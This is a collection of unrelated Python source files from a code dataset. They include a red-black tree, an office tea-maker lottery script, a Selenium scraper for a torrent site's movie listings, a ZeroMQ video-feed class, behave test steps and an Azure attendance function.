command=retrieve_input)\r\n\r\nbuttonCommit.pack()\r\nmainloop();","sub_path":"SpamPrediction/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"379183653","text":"class Node:\n def __init__(self, key, content):\n self.key = key\n self.content = content\n self.black = False\n self.left = None\n self.right = None\n self.parent = None\n\n def is_black(self):\n return self.black\n\n def is_red(self):\n return not self.black\n\n def is_four_node(self):\n return (self.left is not None and not self.left.black) and\\\n (self.right is not None and not self.right.black)\n\n def flip_color(self):\n self.black = not self.black\n self.left.black = not 
self.left.black\n self.right.black = not self.right.black\n\n def is_two_node(self):\n if not self.black:\n return False\n\n # Change this to be more inclusive\n\n if (self.left is None) and (self.right is None):\n return True\n\n return (self.left is not None and self.left.black) and\\\n (self.right is not None and self.right.black)\n\n def is_left_child(self):\n return (self.parent is not None) and (self.parent.left == self)\n\n def is_right_child(self):\n return (self.parent is not None) and (self.parent.right == self)\n\n def set_right_child(self, child):\n previous = self.right\n\n self.right = child\n if self.right is not None:\n self.right.parent = self\n\n if previous is not None:\n previous.parent = None\n \n return previous\n\n def rotate_left(self):\n \"\"\" Rotate this node to the left, and return the highest node after rotation.\n\n A rotation is a local O(1) operation that restructures nodes such that\n one subtree gets closer the root, and another subtree gets one level\n further from the root. This operation preserves the in-order property\n of the RB-tree.\n\n This is used to rotate a right leaning 3-node to a left leaning 3-\n node.\n\n self x\n a x => self c\n b c a b\n \"\"\"\n parent = self.parent\n\n if self.right is None:\n raise RuntimeError(\"Can't rotate right.\")\n\n x = self.right\n\n self.right = x.left\n\n if self.right is not None:\n self.right.parent = self\n\n x.left = self\n\n if x.left is not None:\n x.left.parent = x\n\n x.parent = parent\n if parent is not None:\n if parent.left == self:\n parent.left = x\n elif parent.right == self:\n parent.right = x\n else:\n raise RuntimeError(\"Invariant broken\")\n\n (x.black, self.black) = (self.black, x.black)\n\n return x\n\n def rotate_right(self):\n \"\"\"\n self x\n x c => a self\n a b b c\n \"\"\"\n parent = self.parent\n\n if self.left is None:\n raise RuntimeError(\"Can't rotate right: no left child\")\n\n x = self.left\n\n self.left = x.right\n\n if self.left is not None:\n self.left.parent = self\n\n x.right = self\n\n if x.right is not None:\n x.right.parent = x\n\n x.parent = parent\n if parent is not None:\n if parent.left == self:\n parent.left = x\n elif parent.right == self:\n parent.right = x\n else:\n raise RuntimeError(\"Invariant broken\")\n\n (x.black, self.black) = (self.black, x.black)\n\n return x\n\n\n def set_left_child(self, child):\n previous = self.left\n\n self.left = child\n if self.left is not None:\n self.left.parent = self\n\n if previous is not None:\n previous.parent = None\n\n return previous\n\n def split(self):\n if not self.is_four_node():\n return\n\n if self.parent is None:\n # Root\n self.flip_color()\n self.black = True\n else:\n if self.parent.is_two_node():\n self.flip_color()\n else:\n # 3-node parent\n if self.is_left_child():\n if self.parent.black:\n self.flip_color()\n elif self.parent.is_left_child():\n self.parent.parent.rotate_right()\n self.flip_color()\n else:\n self.flip_color()\n self.parent.rotate_right()\n self.parent.rotate_left()\n else:\n # We are a right child.\n if self.parent.black:\n self.flip_color()\n elif self.parent.is_right_child():\n self.parent.parent.rotate_left()\n self.flip_color()\n else:\n self.flip_color()\n self.parent.rotate_left()\n self.parent.rotate_right()\n\n\n def fix_4_node(self):\n # When called, we know that the recently added node must be red.\n\n # Root\n if self.parent is None:\n # Can't happen actually....\n return\n\n # Not a four node.\n if self.parent.black:\n return\n\n t_left = self.is_left_child()\n p_left = 
self.parent.is_left_child()\n\n if t_left and p_left:\n self.parent.parent.rotate_right()\n elif not t_left and not p_left:\n self.parent.parent.rotate_left()\n elif t_left and not p_left:\n self.parent.rotate_right()\n self.parent.rotate_left()\n elif not t_left and p_left:\n self.parent.rotate_left()\n self.parent.rotate_right()\n\n\n def insert(self, key, content):\n if self.key is None:\n self.key = key\n self.content = content\n return self\n\n self.split()\n\n if key > self.key:\n if self.right is None:\n self.set_right_child(Node(key, content))\n self.right.fix_4_node()\n else:\n self.right.insert(key, content)\n elif key < self.key:\n if self.left is None:\n self.set_left_child(Node(key, content))\n self.left.fix_4_node()\n else:\n self.left.insert(key, content)\n\n root = self\n\n while root.parent is not None:\n root = root.parent\n\n root.black = True\n return root\n\n\n def combine(self):\n # Root nodes can not be combined.\n if self.parent is None:\n return\n\n # Skip all non two nodes.\n if not self.is_two_node():\n return\n\n if self.parent.is_two_node():\n is_left = self.is_left_child()\n # Get sibling\n if is_left:\n sibling = self.parent.right\n else:\n sibling = self.parent.left\n\n # Sanity check...\n if sibling is None:\n raise RuntimeError('Two node with only one child.')\n\n # Two node\n if sibling.is_two_node():\n # Create a four node.\n self.parent.flip_color()\n self.parent.black = True\n return\n\n # Four node\n if sibling.is_four_node():\n if is_left:\n sibling.rotate_right()\n #self.parent.rotate_left()\n else:\n top = sibling.rotate_left()\n top.left.black = True\n self.parent.rotate_right()\n\n return\n\n # Three node\n\n\n def delete(self, key):\n self.combine()\n\n if self.key == key:\n return True\n\n if (self.left is not None) and (key < self.key):\n return self.left.delete(key)\n elif (self.right is not None) and (key > self.key):\n return self.right.delete(key)\n\n return False\n\n\n def print(self, filename):\n with open(filename, 'w') as of:\n of.write('digraph rb {\\n')\n of.write(' node[shape = record];\\n')\n out = self.dot()\n of.write(out[0])\n of.write('}')\n\n\n def add_dummy_leaves(self, tag):\n if self.left is None:\n self.left = Node(tag, tag)\n self.left.black = True\n tag = chr(ord(tag) + 1)\n else:\n tag = self.left.add_dummy_leaves(tag)\n\n if self.right is None:\n self.right = Node(tag, tag)\n self.right.black = True\n tag = chr(ord(tag) + 1)\n else:\n tag = self.right.add_dummy_leaves(tag)\n\n return tag\n\n\n def height_234(self, h):\n left_height = h\n right_height = h\n\n if self.left is not None:\n if self.left.black:\n k = 1\n else:\n k = 0\n\n left_height = self.left.height_234(h + k)\n\n if self.right is not None:\n if self.right.black:\n k = 1\n else:\n k = 0\n\n right_height = self.right.height_234(h + k)\n\n return max(left_height, right_height)\n\n def dot(self, c=0):\n if self.content is None:\n return None\n\n if self.black:\n output = ' node{}[label = \"| {}|\"];\\n'.format(c, self.content)\n else:\n output = ' node{}[label = \"| {}|\", color=red];\\n'.format(c, self.content)\n\n root = c\n\n if (self.left is not None) and (self.left.content is not None):\n (o2, c) = self.left.dot(c+1) \n output += o2\n\n if self.left.black:\n output += ' \"node{}\":l->\"node{}\":m;\\n'.format(root, root+1)\n else:\n output += ' \"node{}\":l->\"node{}\":m [color=red];\\n'.format(root, root+1)\n else:\n output += ' node{} [style=\"invisible\"];\\n'.format(root+1)\n output += ' \"node{}\":l->node{} [style=\"invisible\"];\\n'.format(root, 
root+1)\n c = c+1\n\n if (self.right is not None) and (self.right.content is not None):\n c_plus = c+1\n (o2, c) = self.right.dot(c_plus)\n output += o2\n\n if self.right.black:\n output += ' \"node{}\":r->\"node{}\":m;\\n'.format(root, c_plus)\n else:\n output += ' \"node{}\":r->\"node{}\":m [color=red];\\n'.format(root, c_plus)\n\n else:\n output += ' node{} [style=\"invisible\"];\\n'.format(c+1)\n output += ' \"node{}\":r->node{} [style=\"invisible\"];\\n'.format(root, c+1)\n c = c+1\n\n return (output, c+1)\n\n\nclass RbTree:\n def __init__(self):\n self.root = Node(None, None)\n self.root.black = True\n\n def insert(self, key, content = None):\n if content is None:\n self.root = self.root.insert(key, key)\n else:\n self.root = self.root.insert(key, content)\n\n self.root.black = True\n\n def delete(self, key):\n self.root.delete(key)\n\n while self.root.parent is not None:\n self.root = self.root.parent\n\n def dot(self, filename, label):\n with open(filename, 'w') as of:\n of.write('digraph rb {\\n')\n of.write(' node[shape = record];\\n')\n out = self.root.dot()\n of.write(out[0])\n of.write(' labelloc=\"t\";\\n')\n of.write(' label=\"{}\";\\n'.format(label))\n of.write('}')\n \n\ndef standard(offset = 0):\n a = Node(offset + 0, \"a\")\n a.black = True\n b = Node(offset + 2, \"b\")\n b.black = True\n c = Node(offset + 4, \"c\")\n c.black = True\n d = Node(offset + 6, \"d\")\n d.black = True\n\n S = Node(offset + 1, \"S\")\n S.set_left_child(a)\n S.set_right_child(b)\n\n L = Node(offset + 5, \"L\")\n L.set_left_child(c)\n L.set_right_child(d)\n\n M = Node(offset + 3, \"M\")\n M.black = True\n M.set_left_child(S)\n M.set_right_child(L)\n\n return M\n\ndef b2():\n M = standard()\n\n e = Node(\"e\")\n P = Node(\"P\")\n P.set_right_child(e)\n P.set_left_child(M)\n\n return P\n\ndef b4():\n M = standard()\n\n e = Node(\"e\")\n f = Node(\"f\")\n P = Node(\"P\")\n P.set_right_child(e)\n P.set_left_child(M)\n P.black = False\n Q = Node(\"Q\")\n Q.set_left_child(P)\n Q.set_right_child(f)\n\n return Q\n\ndef b6():\n M = standard(3)\n\n P = Node(2, \"P\")\n P.black = True\n x = Node(1, 'x')\n x.black = True\n P.set_left_child(x)\n\n Q = Node(10, \"Q\")\n f = Node(11, 'f')\n f.black = True\n Q.set_right_child(f)\n Q.set_left_child(M)\n P.set_right_child(Q)\n\n return P\n\ndef print_rb(rb, filename):\n with open(filename, 'w') as of:\n of.write('digraph rb {\\n')\n of.write(' node[shape = record];\\n')\n out = rb.dot()\n of.write(out[0])\n of.write('}')\n\ndef insert():\n R = Node(60, 60)\n R.black = True\n R = R.insert(30, 30)\n R = R.insert(10, 10)\n R = R.insert(20, 20)\n R = R.insert(50, 50)\n R = R.insert(40, 40)\n R = R.insert(70, 70)\n R = R.insert(80, 80)\n R = R.insert(15, 15)\n R = R.insert(90, 90)\n R = R.insert(100, 100)\n\n print_rb(R, \"R.dot\")\n\n\n#insert()\n","sub_path":"joke/Gebruiker-stock/rb_tree.py","file_name":"rb_tree.py","file_ext":"py","file_size_in_byte":13342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"245224016","text":"\"\"\"Chooser Script, developed to choose between several email address\nDEVELOPED: 26/06/2014\nLAST UPDATE: 03/07/2014 14:58\n\t- Completed checking of alreday existing participent\n\t- Completed storing, loading and saving of particpent data\n\t- Continue with the unlcuky and lucky texts in sendTheMail\nDEVELOPED BY: Matt Sutton, Scott Jones\n\"\"\"\n### Import necessary modules\nimport smtplib\nimport random\nimport time\nimport sys\nimport os\nfrom time import gmtime, strftime\n### Set 
necessary global variables\nemailSent = 0\ntakingPart = []\n\ndef handleTheTime():\n\t"""Function to handle the current time. Timing could be an issue, check"""\n\tglobal emailSent\n\t# Grab the day, hour and minute\n\thour = int(strftime("%H"))\n\tday = str(strftime("%a"))\n\tminute = int(strftime("%M"))\n\t#Set the next hour\n\twhile (hour != 11 and hour != 15) and (day != "Sat" and day != "Sun"):\n\t\thour = int(strftime("%H"))\n\t\tday = str(strftime("%a"))\n\t\tminute = int(strftime("%M"))\n\t\tif hour >= 12 and hour <= 13:\n\t\t\temailSent = 0\n\t\telif hour >= 16 and hour <= 17:\n\t\t\temailSent = 0\n\t\tprint("The time isn't 11 or 15")\n\t\ttime.sleep(10)\n\n\t#Send it yo\n\t#if emailSent == 0:\n\tsend = sendTheMail()\n\t\t#send.sendIt()\n\t#\temailSent = 1\n\t#time.sleep(10)\n\nclass chooseTheMakers():\n\t"""Class to choose the email addresses"""\n\tdef __init__(self):\n\t\t"""init function, define variables"""\n\t\t# initialise People\n\t\tself.whosInvolved()\n\t\t# Create the address list\n\t\ttry:\n\t\t\tself.addresses\n\t\t\tself.chosenNames\n\t\texcept:\n\t\t\tself.addresses = []\n\t\t\tself.chosenNames = []\n\t\tfor x in range(self.noInvolved):\n\t\t\tself.addresses.append(x)\n\t\t\tself.chosenNames.append(x)\n\t\t# Call the random function to get the addresses\n\t\tself.chooseThem()\n\n\tdef whosInvolved(self):\n\t\t"""Function to accept input from the user, determining who's taking part"""\n\t\tos.system("clear")\n\t\thandle = ""\n\t\twhile not handle:\n\t\t\ttry:\n\t\t\t\tself.noInvolved = int(raw_input("Number of Participants: "))\n\t\t\t\thandle = 1\n\t\t\t\tself.person = []\n\t\t\t\tself.toBeChosen = self.handleTheList()\n\t\t\t\tfor x in range(self.noInvolved):\n\t\t\t\t\tself.person.append(x)\n\t\t\texcept ValueError:\n\t\t\t\tprint("Please enter a valid number")\n\t\tfor x in range(self.noInvolved):\n\t\t\texists = 0\n\t\t\twhile exists == 0:\n\t\t\t\tname = raw_input("Participant %s: " % (x + 1))\n\t\t\t\tif name not in takingPart:\n\t\t\t\t\ttakingPart.append(name)\n\t\t\t\t\tself.person[x] = person(name)\n\t\t\t\t\texists += 1\n\t\t\t\telse:\n\t\t\t\t\tprint("Participant name already in use! Try again")\n\t\t\t\t\ttime.sleep(1)\n\t\n\tdef chooseThem(self):\n\t\t"""Function to choose the addresses"""
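\n\t\t# Drawing repeatedly with random.choice from a shrinking pool (below) is an\n\t\t# unbiased shuffle; random.sample(range(self.noInvolved), self.noInvolved)\n\t\t# would be an equivalent single call.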
\t\t#CONTINUE HERE.... choosing addresses and names and storing in lists\n\t\t#Create our list of addresses and names\n\t\tself.names = []\n\t\tself.theNumberList = []\n\t\ttempNumList = []\n\t\tfor x in range(self.noInvolved):\n\t\t\tself.names.append(self.person[x].name)\n\t\t\ttempNumList.append(x)\n\t\t#Now create our chosen and unchosen number list\n\t\tfor x in range(self.noInvolved):\n\t\t\tself.theNumberList.append(random.choice(tempNumList))\n\t\t\ttempNumList.remove(self.theNumberList[x])\n\t\t#Now create our literal chosen and unchosen lists\n\t\tself.teaMakersNames = []\n\t\tself.teaMakersEmails = []\n\t\tself.luckyOnesNames = []\n\t\tself.luckyOnesEmails = []\n\t\tfor x in range(self.toBeChosen):\n\t\t\tself.teaMakersNames.append(self.person[self.theNumberList[x]].name)\n\t\t\tself.teaMakersEmails.append(self.person[self.theNumberList[x]].email)\n\t\t\tself.person[self.theNumberList[x]].timesChosen += 1\n\t\t\tself.person[self.theNumberList[x]].profileSave()\n\t\tfor x in range(self.toBeChosen, self.noInvolved):\n\t\t\tself.luckyOnesNames.append(self.person[self.theNumberList[x]].name)\n\t\t\tself.luckyOnesEmails.append(self.person[self.theNumberList[x]].email)\n\t\t#Finally, increment the chosen values of those chosen and SAVE\n\t\tsys.exit()\n\t\t\n\tdef handleTheList(self):\n\t\t"""Function to handle the quantity of chosen or not chosen, depending on list size"""\n\t\tif self.noInvolved == 2:\n\t\t\ttoBeChosen = 1\n\t\telif self.noInvolved == 3:\n\t\t\ttoBeChosen = 2\n\t\telif self.noInvolved == 4:\n\t\t\ttoBeChosen = 2\n\t\telif self.noInvolved == 5:\n\t\t\ttoBeChosen = 3\n\t\telif self.noInvolved == 6:\n\t\t\ttoBeChosen = 3\n\t\telif self.noInvolved == 7:\n\t\t\ttoBeChosen = 3\n\t\telif self.noInvolved == 8:\n\t\t\ttoBeChosen = 4\n\t\telif self.noInvolved < 2:\n\t\t\tprint("Not Enough participants! Minimum of 2.")\n\t\t\tsys.exit()\n\t\telif self.noInvolved > 8:\n\t\t\tprint("Too many participants! Maximum of 8")\n\t\t\tsys.exit()\n\t\telse:\n\t\t\tprint("A fatal error occurred!")\n\t\t\tsys.exit()\n\t\treturn toBeChosen\n\nclass person():\n\tdef __init__(self, name):\n\t\t"""Init function for person, determines their email address and name"""\n\t\tself.email = ""\n\t\tdirList = os.listdir("./")\n\t\tself.name = str(name).lower()\n\t\tif (self.name + ".txt") in dirList:\n\t\t\t#Then open file and load profile\n\t\t\tuserContents = open(str(self.name + ".txt"), "r")\n\t\t\tuserContents = userContents.readlines()\n\t\t\tself.email = str(userContents[1].rstrip())\n\t\t\tself.timesChosen = int(userContents[2].rstrip())\n\t\t\tprint(self.email, self.timesChosen)\n\t\telse:\n\t\t\t#Otherwise create a profile
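\n\t\t\t# Profile files (written by profileSave) are three plain-text lines:\n\t\t\t# name, email, times chosen. raw_input assumes Python 2, matching\n\t\t\t# the rest of the script.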
\n\t\t\tchoice = raw_input("\nProfile for %s does not exist, create one?[yn]" % self.name)\n\t\t\twhile choice.lower() != "y" and choice.lower() != "n":\n\t\t\t\tprint("Invalid option! Please enter 'y' or 'n'")\n\t\t\t\ttime.sleep(1)\n\t\t\t\tchoice = raw_input("\nProfile for %s does not exist, create one?[yn]" % self.name)\n\t\t\tif choice == 'y':\n\t\t\t\ttime.sleep(1)\n\t\t\t\tself.timesChosen = 0\n\t\t\t\tself.email = raw_input("%s's email: " % self.name)\n\t\t\t\tself.profileSave()\n\t\t\t\ttime.sleep(1)\n\t\t\t\tprint("Profile Created successfully!\n")\n\n\n\tdef profileSave(self):\n\t\t"""Function to create a user's profile"""\n\t\tprint("SAVING!")\n\t\tnewUser = open("./%s.txt" % self.name, "w")\n\t\tnewUser.write("%s\n%s\n%s" % (self.name, self.email, self.timesChosen))\n\t\tnewUser.close()\n\n\tdef __str__(self):\n\t\t"""Function to print the name"""\n\t\treturn str(self.name + " " + self.email)\n\nclass sendTheMail():\n\t"""Class to send the mail"""\n\tdef __init__(self):\n\t\t"""init function, define variables"""\n\t\tself.server = "exch-01"\n\t\tself.sender = "matt.sutton@satisnet.co.uk"\n\t\tself.defineEmail()\n\t\tprint(self.unluckyText)\n\t\tprint(self.luckyText)\n\t\n\tdef defineEmail(self):\n\t\t"""Function to define the email contents"""\n\t\tself.subject = "TEA"\n\t\tself.unluckyText = "Unlucky!! You have been chosen.\n\n"\n\t\tfor x in range(choosing.toBeChosen):\n\t\t\tself.unluckyText = self.unluckyText + "Tea Maker %s: %s" % (x,choosing.teaMakersNames[x])\n\t\tprint(self.unluckyText)\n\t\tsys.exit()\n\t\t\t\n\t\tself.unluckyText = "Unlucky!! You have been chosen.\n\nFirst Maker: %s.\nSecond Maker: %s.\nThird Maker: %s.\nFirst Winner: %s.\nSecond Winner: %s.\nThird Winner %s.\n\nTotal Times Chosen:\nAndy = %i.\nMatt = %i.\nBarney = %i.\nScott = %i.\nConnor = %i.\nHaydn = %i\n\n" % (self.chosenNames[0], self.chosenNames[1], self.chosenNames[2], self.chosenNames[3], self.chosenNames[4], self.chosenNames[5], choosing.Andy.timesChosen, choosing.Matt.timesChosen, choosing.Barney.timesChosen, choosing.Scott.timesChosen, choosing.Connor.timesChosen, choosing.Haydn.timesChosen)\n\t\tself.luckyText = "Congratulations!! 
You have NOT been chosen.\\n\\nFirst Maker: %s.\\nSecond Maker: %s.\\nThird Maker: %s.\\nFirst Winner: %s.\\nSecond Winner: %s.\\nThird Winner %s.\\n\\nTotal Times Chosen:\\nAndy = %i.\\nMatt = %i.\\nBarney = %i.\\nScott = %i.\\nConnor = %i.\\nHaydn = %i\\n\\n\" % (self.chosenNames[0], self.chosenNames[1], self.chosenNames[2], self.chosenNames[3], self.chosenNames[4], self.chosenNames[5], choosing.Andy.timesChosen, choosing.Matt.timesChosen, choosing.Barney.timesChosen, choosing.Scott.timesChosen, choosing.Connor.timesChosen, choosing.Haydn.timesChosen)\t\t\t\n\t\treturn self.unluckyText, self.luckyText\n\n\tdef sendIt(self):\n\t\t\"\"\"Function to send the emails\"\"\"\n\t\tprint(self.addresses)\n\t\t\n\n\"\"\"Commence main program\"\"\"\nwhile 1:\n\tchoosing = chooseTheMakers()\n\thandleTheTime()\n","sub_path":"theScript.py","file_name":"theScript.py","file_ext":"py","file_size_in_byte":7707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"505686209","text":"# -*- coding: utf-8 -*-\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.ui import Select\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.common.exceptions import NoAlertPresentException\nimport re, os, urllib, logging\nimport argparse\nfrom ToolBox import Utils\n\n\nclass YTS(object):\n\n def __init__(self):\n profile = webdriver.FirefoxProfile()\n profile.set_preference('permissions.default.image', 2)\n profile.set_preference('dom.ipc.plugins.enabled.libflashplayer.so', 'false')\n profile.set_preference('javascript.enable', 'false')\n self.driver = webdriver.Firefox(firefox_profile=profile)\n self.driver.implicitly_wait(30)\n self.base_url = \"https://yts.am/\"\n self.verificationErrors = []\n self.accept_next_alert = True\n logging.basicConfig(filename='ytsruntime.log', level=logging.DEBUG)\n self.logger = logging.getLogger(\"YTS\")\n\n def get_href(self):\n driver = self.driver\n elements = driver.find_elements_by_xpath(\"//a[@href]\")\n href_list = list()\n for elem in elements:\n href_list.append(elem.get_attribute(\"href\"))\n return href_list\n\n def result_links(self):\n hrefs = self.get_href()\n regex = re.compile(r'https://yts\\.am/movie/.*')\n selection = filter(regex.search, hrefs)\n linkset = set(selection)\n return linkset\n\n def imdb_link(self):\n hrefs = self.get_href()\n regex = re.compile(r'https://www\\.imdb\\.com/title/.*/$')\n selection = filter(regex.search, hrefs)\n linkset = set(selection)\n return linkset.pop()\n\n def torrent_links(self):\n hrefs = self.get_href()\n regex = re.compile(r'https://yts\\.am/torrent/download/.*$')\n selection = filter(regex.search, hrefs)\n linkset = set(selection)\n return linkset\n\n def magnet_links(self):\n hrefs = self.get_href()\n regex = re.compile(r'magnet:\\?xt=urn:btih:.*')\n selection = filter(regex.search, hrefs)\n linkset = set(selection)\n return linkset\n\n def search(self,term):\n util = Utils()\n driver = self.driver\n uri = self.base_url + \"browse-movies/\" + urllib.quote_plus(term)\n self.logger.info(\"Opening \" + uri)\n driver.get(uri)\n xpath = \"//h2\"\n\n try:\n results = driver.find_element_by_xpath(xpath).text\n self.logger.info(results)\n number = util.get_first(results)\n self.logger.debug(number + \" results\")\n if (number > 0):\n self.logger.info(\"Getting results metadata\")\n return self.result_links()\n except NoSuchElementException as e:\n 
self.logger.error(\"Error getting element \" + xpath)\n\n @staticmethod\n def magnet_name(uri):\n regex = re.compile(r'dn=(.*?)&')\n match = regex.search(uri).group(1)\n return urllib.unquote(\n urllib.unquote(match))\n\n @staticmethod\n def magnet_hash(uri):\n regex = re.compile(r'btih:(.*?)&')\n match = regex.search(uri).group(1)\n return match\n\n @staticmethod\n def year(name_field):\n regex = re.compile(r'\\((.*?)\\)')\n match = regex.search(name_field).group(1)\n return match\n\n @staticmethod\n def res(name_field):\n regex = re.compile(r'\\[(.*?)\\]')\n match = regex.search(name_field).group(1)\n return match\n\n @staticmethod\n def name(name_field):\n regex = re.compile(r'^(.*?)\\(')\n match = regex.search(name_field).group(1)\n utils = Utils()\n s = utils.char_espace(match, \"+\")\n return s.strip()\n\n def name_split(self, name_field):\n hashdict = {\n 'name': self.name(name_field),\n 'year': self.year(name_field),\n 'resolution': self.res(name_field)\n }\n return hashdict\n\n def magnet_named(self):\n magnets = self.magnet_links()\n dictio = {}\n for magnet in magnets:\n name_field = self.magnet_name(magnet)\n hash_field = self.magnet_hash(magnet)\n torrent_link = \"https://yts.am/torrent/download/\" + hash_field.upper()\n dictio[hash_field] = {\n 'link': torrent_link,\n 'name': self.name(name_field),\n 'year': self.year(name_field),\n 'resolution': self.res(name_field),\n 'magnetlink': magnet\n }\n return dictio\n\n def get_movie(self, uri):\n driver = self.driver\n driver.get(uri)\n try:\n metadata = {\n 'imdb' : self.imdb_link()\n }\n metadata.update(self.magnet_named())\n return metadata\n except NoSuchElementException as e:\n self.logger.error(\"Error getting elements\")\n\n def quit(self):\n self.driver.quit()\n\n def query(self,args):\n links = self.search(args)\n allmetadata = {}\n result_index = 0\n for link in links:\n allmetadata[result_index] = {\n 'YTS': link,\n 'meta': self.get_movie(link)\n }\n result_index += 1\n\n self.quit()\n return allmetadata\n\n\n def __del__(self):\n self.quit()\n\n","sub_path":"Scraper/YTS.py","file_name":"YTS.py","file_ext":"py","file_size_in_byte":5417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"78162184","text":"\nfrom utils_base_classes import TemplateCollection\nfrom urls import reverse_api\n\nUPLOADER_JS = u\"\"\"\n\n\"\"\"\n\nUPLOADER_HTML = u\"\"\"\n\n
      \n\t\n
      \n\n\n\n\"\"\"\n\nclass ViewTemplateCollection(TemplateCollection):\n\ttemplate = UPLOADER_HTML\n\n\n\tdef context(self, uploader):\n\t\treturn dict(\n\t\t\tscript_js=UPLOADER_JS\n\t\t)\n\n","sub_path":"Libraries/template_uploader.py","file_name":"template_uploader.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"456605350","text":"\"\"\"\nModels\n\"\"\"\n\nimport logging\nimport socket\nimport threading\nimport time\n\nimport cv2\nimport numpy as np\nimport zmq\n\nfrom vision_on_edge.azure_app_insight.utils import get_app_insight_logger\nfrom vision_on_edge.azure_iot.utils import is_edge\nfrom vision_on_edge.azure_settings.models import Setting\n\nlogger = logging.getLogger(__name__)\n\n\ndef inference_url():\n if is_edge():\n ip = socket.gethostbyname('InferenceModule')\n return 'tcp://' + ip + ':5558'\n return 'tcp://localhost:5558'\n\n\nclass VideoFeed():\n \"\"\"VideoFeed.\n \"\"\"\n\n def __init__(self):\n self.keep_alive = time.time()\n self.last_active = time.time()\n self.context = zmq.Context()\n self.mutex = threading.Lock()\n self.is_opened = True\n self.receiver = self.context.socket(zmq.PULL)\n\n def gen(self):\n \"\"\"gen\n\n video feed genarator\n \"\"\"\n\n # context = zmq.Context()\n # receiver = context.socket(zmq.PULL)\n self.receiver.connect(inference_url())\n\n while self.is_opened:\n ret = self.receiver.recv_pyobj()\n\n nparr = np.frombuffer(np.array(ret['data']), np.uint8)\n\n # logger.warning('Receive: %s', ret['ts'])\n # logger.warning('Time elapsed: %s', (time.time()-self.keep_alive))\n img = cv2.imdecode(nparr, cv2.IMREAD_COLOR)\n\n # ret2 = receiver.recv_pyobj()\n # logger.warning(ret2['ts'])\n # logger.warning(ret2['shape'])\n\n yield (b'--frame\\r\\n'\n b'Content-Type: image/jpeg\\r\\n\\r\\n' +\n cv2.imencode('.jpg', img)[1].tobytes() + b'\\r\\n')\n self.receiver.close()\n\n def update_keep_alive(self):\n \"\"\"update_keep_alive.\n \"\"\"\n self.keep_alive = time.time()\n\n def close(self):\n \"\"\"close connection\n \"\"\"\n self.is_opened = False\n # self.receiver.close()\n logger.warning('connection close')\n","sub_path":"factory-ai-vision/EdgeSolution/modules/WebModule/backend/vision_on_edge/video_feed/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"410160800","text":"from selenium.webdriver.common.keys import Keys\nimport time\n\n@when(u'I visit \"{url}\"')\ndef visit(context,url):\n context.browser.get(url)\n\n@then(u'I will see the page title mentions \"{expected_title}\"')\ndef see_title_mentions(context,expected_title):\n title = context.browser.title\n context.test.assertIn(expected_title,title)\n\n@then(u'I will see the page header mentions \"{expected_header}\"')\ndef see_header_mentions(context,expected_header):\n header = context.browser.find_element_by_tag_name('h1').text\n context.test.assertIn(expected_header,header)\n\n@then(u'I will see a text box and will be prompted to input \"{expected_prompt}\"')\ndef see_text_box_with_ptompt(context,expected_prompt):\n inputbox = context.browser.find_element_by_id('id_new_item')\n placeholder = inputbox.get_attribute('placeholder')\n context.test.assertEqual(placeholder,expected_prompt)\n\n@when(u'I type \"{text_input}\" into a text box and press enter')\ndef type_text_and_press_enter(context,text_input):\n inputbox = 
context.browser.find_element_by_id('id_new_item')\n inputbox.send_keys(text_input)\n inputbox.send_keys(Keys.ENTER)\n time.sleep(1)\n\n@then(u'I will see the row lists \"{expected_item}\" item in a table')\ndef see_item_in_table(context,expected_item):\n table = context.browser.find_element_by_id('id_list_table')\n rows = table.find_elements_by_tag_name('tr')\n context.test.assertIn(expected_item,[row.text for row in rows])\n\n@given(u'I have typed \"{text_input}\" into a text box and press enter')\ndef typed_text_input(context,text_input):\n inputbox = context.browser.find_element_by_id('id_new_item')\n inputbox.send_keys(text_input)\n inputbox.send_keys(Keys.ENTER)\n time.sleep(1)\n\n","sub_path":"features/steps/my_list.py","file_name":"my_list.py","file_ext":"py","file_size_in_byte":1719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"110932525","text":"import sys\nimport os\nsys.path.append(os.path.abspath(\"\"))\n\nimport logging, json\nimport azure.functions as func\nfrom datetime import datetime\nfrom .config import DATE_FORMAT, DATETIME_FORMAT\nfrom .controllers import EmployeeAttendanceController\n\ndef main(req: func.HttpRequest) -> func.HttpResponse:\n logging.info('Python HTTP trigger function processed a request.')\n req_body = req.get_json()\n\n if req_body:\n\n try:\n employee_attendance_controller = EmployeeAttendanceController()\n for time_log in req_body:\n log_no = time_log['log_no']\n employee_id = time_log['employee_id']\n employee_name = time_log['employee_name']\n date = time_log['date']\n time_logged = time_log['time_logged']\n employee_attendance_controller.put_data(log_no, employee_id, \n employee_name, date, time_logged)\n employee_attendance_records = employee_attendance_controller.get_attendance_records() \n response = serialize_response(employee_attendance_records)\n return response\n except Exception as e:\n error_msg = str(repr(e))\n logging.error(error_msg)\n return json.dumps({'status' : 'error', 'status_description': repr(e)})\n else:\n return json.dumps({\n 'status' : 'ok',\n 'description' : 'Please send a request containing the time logs.'})\n\ndef serialize_response(attendance_records):\n def get_json_time_logs(daily_record):\n time_logs = []\n for time_log in daily_record.time_logs:\n json_tl = {\n 'time_in' : datetime.strftime(time_log.time_in, DATETIME_FORMAT)[11:],\n 'time_out' : \n datetime.strftime(time_log.time_out, DATETIME_FORMAT)[11:] if \n time_log.time_out else ''}\n time_logs.append(json_tl)\n return time_logs\n\n def get_json_daily_records(attendance_record):\n daily_records = []\n for daily_record in attendance_record.daily_records:\n json_dr = {\n 'date' : datetime.strftime(daily_record.date, DATE_FORMAT),\n 'hours_worked' : round(daily_record.get_hours_worked(), 2),\n 'time_logs' : 